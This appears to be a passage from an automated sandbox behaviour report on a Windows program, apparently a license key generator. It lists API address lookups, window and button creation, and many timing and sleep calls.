| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x76c311a9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x76c349ad |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x76c311e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x76c314fb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x76c33587 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x76c3495d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x76c37a10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x76c34a6f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleCtrlHandler, address_out = 0x76c38a09 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x76c33ed3 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x76c31328 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x76cd6f53 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x76c4a77d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameA, address_out = 0x76c314b1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x76c3170d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x76c31222 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x7715e026 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringW, address_out = 0x76c33bca |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x76c317b9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x76c3179c |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x77171f6e |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x76c3469b |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x76cd7bff |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x76cd739a |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x76c4c807 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x76cb454f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x76c31946 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x76c33f5c |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindClose, address_out = 0x76c34442 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindFirstFileExA, address_out = 0x76cb427f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindNextFileA, address_out = 0x76c5d53e |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x76c34493 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x76c5d1a1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x76c35189 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineA, address_out = 0x76c351a1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x76c35223 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x76c351e3 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x76c351cb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEnvironmentVariableA, address_out = 0x76c3e331 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x76c314e9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x76c57aca |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77163002 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x76c4ce2e |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77169d35 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RaiseException, address_out = 0x76c358a6 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleA, address_out = 0x76c31245 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x76c31450 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x76c3192e |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x76c311c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x76c31282 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x76c33531 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x76c351b3 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x76c314c9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenA, address_out = 0x76c35a4b |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = MessageBoxA, address_out = 0x74fafd1e |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetUserObjectInformationW, address_out = 0x74f58068 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetProcessWindowStation, address_out = 0x74f59eea |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = ReportEventA, address_out = 0x74d43ee9 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegisterEventSourceA, address_out = 0x74d52d46 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = DeregisterEventSource, address_out = 0x74d535dd |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x76c34d28 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x76c34f2b |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x76c34208 |
|
2 | |
| Get Address | c:\windows\syswow64\api-ms-win-core-synch-l1-2-0.dll | function = InitializeCriticalSectionEx, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x76c31252 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x76cb47f1 |
|
1 | |
| Get Address | c:\users\5p5nrg~1\appdata\local\temp\r2rlive.dll | function = GenerateLicense, address_out = 0x74351000 |
|
1 |
Window (24)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | Hot Soup Processor ver.3.4a | class_name = hspwnd0, wndproc_parameter = 0 |
|
1 | |
| Create | - | class_name = edit, wndproc_parameter = 0 |
|
1 | |
| Create | - | class_name = edit, wndproc_parameter = 0 |
|
1 | |
| Create | Generate | class_name = button, wndproc_parameter = 0 |
|
1 | |
| Create | About | class_name = button, wndproc_parameter = 0 |
|
1 | |
| Create | Exit | class_name = button, wndproc_parameter = 0 |
|
1 | |
| Create | - | - |
|
1 | |
| Set Attribute | Hot Soup Processor ver.3.4a | class_name = hspwnd0, index = -21, new_long = -1 |
|
1 | |
| Set Attribute | Hot Soup Processor ver.3.4a | class_name = hspwnd0, index = -21, new_long = 0 |
|
1 | |
| Set Attribute | Hot Soup Processor ver.3.4a | class_name = hspwnd0, index = -16, new_long = -2046820352 |
|
2 | |
| Set Attribute | Hot Soup Processor ver.3.4a | class_name = hspwnd0, index = -20, new_long = 0 |
|
1 | |
| Set Attribute | Hot Soup Processor ver.3.4a | class_name = hspwnd0, index = -21, new_long = 0 |
|
2 | |
| Set Attribute | Hot Soup Processor ver.3.4a | class_name = hspwnd0, index = -20, new_long = 0 |
|
1 | |
| Set Attribute | - | class_name = edit, index = -4, new_long = 4284864 |
|
1 | |
| Set Attribute | - | class_name = edit, index = -16, new_long = 1342242945 |
|
1 | |
| Set Attribute | - | class_name = edit, index = -16, new_long = 1344280645 |
|
1 | |
| Set Attribute | Generate | class_name = button, index = -21, new_long = 2 |
|
1 | |
| Set Attribute | Generate | class_name = button, index = -16, new_long = 1342210048 |
|
1 | |
| Set Attribute | About | class_name = button, index = -21, new_long = 3 |
|
1 | |
| Set Attribute | About | class_name = button, index = -16, new_long = 1342210048 |
|
1 | |
| Set Attribute | Exit | class_name = button, index = -21, new_long = 4 |
|
1 | |
| Set Attribute | Exit | class_name = button, index = -16, new_long = 1342210048 |
|
1 |
System (633)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = 1 milliseconds (0.001 seconds) |
|
11 | |
| Sleep | duration = 100 milliseconds (0.100 seconds) |
|
219 | |
| Sleep | duration = 4995 milliseconds (4.995 seconds) |
|
1 | |
| Sleep | duration = 4666 milliseconds (4.666 seconds) |
|
1 | |
| Sleep | duration = 99 milliseconds (0.099 seconds) |
|
3 | |
| Sleep | duration = 3 milliseconds (0.003 seconds) |
|
1 | |
| Sleep | duration = 97 milliseconds (0.097 seconds) |
|
1 | |
| Sleep | duration = 96 milliseconds (0.096 seconds) |
|
1 | |
| Sleep | duration = 74 milliseconds (0.074 seconds) |
|
1 | |
| Sleep | duration = 93 milliseconds (0.093 seconds) |
|
1 | |
| Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Get Time | type = System Time, time = 2019-07-04 15:37:08 (UTC) |
|
4 | |
| Get Time | type = Ticks, time = 102211 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15294845171 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15334073915 |
|
1 | |
| Get Time | type = System Time, time = 2019-07-04 15:37:09 (UTC) |
|
5 | |
| Get Time | type = Ticks, time = 103444 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15660721417 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15660741789 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15671626136 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15671646590 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15681724511 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15681744279 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15691726649 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15691745846 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15701724499 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15701744557 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15722024223 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15722044485 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15732223019 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15732242407 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15742320397 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15742339413 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15752321075 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15752339910 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15772823130 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15772842650 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15783020543 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15783039972 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15793325145 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15793352776 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15803320599 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15803339570 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15813520368 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15813539317 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15833827326 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15833847820 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15843920766 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15843945666 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15854025019 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15854046620 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15864223648 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15864246591 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15875123700 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15875145714 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15895524034 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15895546247 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15905723239 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15905746025 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15915921104 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15915942631 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15926029246 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15926050817 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15974724683 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15974747076 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15999129671 |
|
1 | |
| Get Time | type = Performance Ctr, time = 15999152328 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16009322528 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16009344381 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16046430114 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16046453948 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16056521763 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16056543228 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16066726387 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16066747634 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16088228591 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16088250392 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16098625874 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16098647098 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16108829023 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16108851191 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16129327979 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16129350534 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16139726805 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16139748920 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16150024747 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16150046139 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16160123465 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16160144618 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16188323850 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16188346705 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16218030590 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16218055463 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16228823702 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16228847004 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16238921479 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16238944860 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16249119909 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16249142145 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16272023417 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16272047202 |
|
1 | |
| Get Time | type = Ticks, time = 108451 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16293021320 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16293045179 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16303219951 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16303243778 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16313318981 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16313342048 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16323519434 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16323542066 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16335688304 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16335889350 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16350319098 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16350343871 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16370520099 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16370543032 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16380720111 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16380743026 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16392122588 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16392148573 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16402520017 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16402544358 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16412724991 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16412758842 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16433520740 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16433544583 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16443720406 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16443741582 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16454120393 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16454141749 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16464225072 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16464246638 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16474423052 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16474443579 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16495224783 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16495246619 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16505422861 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16505443921 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16515521588 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16515541779 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16525723143 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16525745205 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16546124884 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16546146640 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16556222854 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16556244350 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16566524668 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16566557323 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16576923524 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16576944710 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16587725879 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16587747314 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16608126428 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16608147472 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16618326569 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16618347589 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16628426546 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16628447529 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16638423380 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16638443728 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16658423083 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16658443599 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16669126587 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16669457689 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16679023502 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16679043861 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16689635806 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16689660267 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16709861764 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16709882931 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16720018992 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16720039330 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16730320363 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16730341468 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16740519583 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16740540605 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16750720003 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16750740698 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16773623375 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16773645424 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16781223212 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16781245003 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16792120813 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16792141690 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16802320469 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16802341123 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16812720553 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16812742318 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16833318906 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16833340571 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16843717745 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16843739175 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16853920446 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16853943486 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16864117448 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16864138182 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16884316470 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16884337122 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16895019254 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16895040309 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16905117578 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16905137937 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16915316893 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16915336874 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16925415154 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16925435297 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16946314949 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16946335429 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16956416774 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16956437649 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16966614993 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16966635718 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16976715813 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16976736614 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16997615997 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16997637044 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17007916460 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17007937370 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17018315752 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17018336460 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17028515806 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17028536449 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17038930016 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17038950665 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17059517927 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17059538522 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17069815802 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17069836597 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17080015663 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17080036131 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17091015842 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17091036889 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17101216167 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17101237728 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17121815840 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17121837227 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17131914871 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17131935933 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17142115871 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17142137363 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17152214792 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17152235434 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17172516379 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17172536778 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17182838946 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17182863177 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17193819161 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17193840251 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17204019175 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17204040658 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17214417873 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17214438871 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17224615872 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17224635782 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17246015677 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17246036080 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17256217678 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17256240175 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17266519328 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17266540251 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17276617576 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17276638575 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17297917947 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17297939046 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17308117487 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17308138241 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17318518197 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17318539518 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17328720946 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17328743907 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17339820938 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17339843806 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17349518553 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17349539851 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17370027395 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17370048816 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17380149510 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17380174545 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17408363725 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17408386148 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17442219348 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17442241578 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17466818923 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17466840912 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17477017570 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17477039776 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17621324253 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17621348113 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17689022277 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17689044319 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17699118272 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17699139744 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17709237087 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17709259184 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17719536537 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17719559815 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17730021117 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17730043031 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17750151214 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17750172024 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17762659516 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17762680989 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17773016487 |
|
1 | |
